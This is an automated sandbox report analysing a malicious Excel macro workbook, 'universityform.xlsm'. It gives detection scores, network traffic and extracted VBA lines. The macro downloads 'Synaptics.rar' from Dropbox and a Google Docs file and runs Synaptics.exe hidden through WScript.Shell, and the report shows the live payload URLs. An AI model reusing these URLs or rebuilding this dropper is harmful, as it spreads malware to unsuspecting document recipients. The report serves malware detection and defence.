Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
universityform.xlsm

Overview

General Information

Sample name:universityform.xlsm
Analysis ID:1582321
MD5:d04491647385cc373152651890cbc6e0
SHA1:b288e5e87ce113af41881431c7004904f6d6ba89
SHA256:2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
Tags:xlsmuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7460 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 5348 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7392 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.217.18.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49737, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 172.217.18.14, SourceIsIpv6: false, SourcePort: 443
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7460, TargetFilename: C:\Users\user\Desktop\~$universityform.xlsm
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T11:11:04.207169+010020283713Unknown Traffic192.168.2.449737172.217.18.14443TCP
2024-12-30T11:11:05.222205+010020283713Unknown Traffic192.168.2.449740162.125.66.18443TCP
2024-12-30T11:11:06.275152+010020283713Unknown Traffic192.168.2.449742162.125.66.18443TCP
2024-12-30T11:12:13.685090+010020283713Unknown Traffic192.168.2.449853172.217.18.14443TCP
2024-12-30T11:12:14.696048+010020283713Unknown Traffic192.168.2.449862162.125.66.18443TCP
2024-12-30T11:12:15.785998+010020283713Unknown Traffic192.168.2.449869162.125.66.18443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: universityform.xlsmAvira: detected
Source: universityform.xlsmVirustotal: Detection: 66%Perma Link
Source: universityform.xlsmReversingLabs: Detection: 68%
Source: universityform.xlsmJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: global trafficDNS query: name: docs.google.com
Source: global trafficDNS query: name: www.dropbox.com
Source: global trafficDNS query: name: www.dropbox.com
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global trafficTCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: global trafficTCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: excel.exeMemory has grown: Private usage: 2MB later: 77MB
Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.217.18.14:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 162.125.66.18:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 162.125.66.18:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49853 -> 172.217.18.14:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49869 -> 162.125.66.18:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49862 -> 162.125.66.18:443
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficDNS traffic detected: DNS query: docs.google.com
Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:11:04 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-q0GAPQFIaaKGQ1rqp0jCGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:12:13 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-nlYMqffGjvrncYmiM7UWdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: vbaProject.binString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: vbaProject.binString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49869 version: TLS 1.2

System Summary

barindex
Source: universityform.xlsmOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: universityform.xlsmOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: universityform.xlsmOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: universityform.xlsmOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: universityform.xlsmOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: universityform.xlsmOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
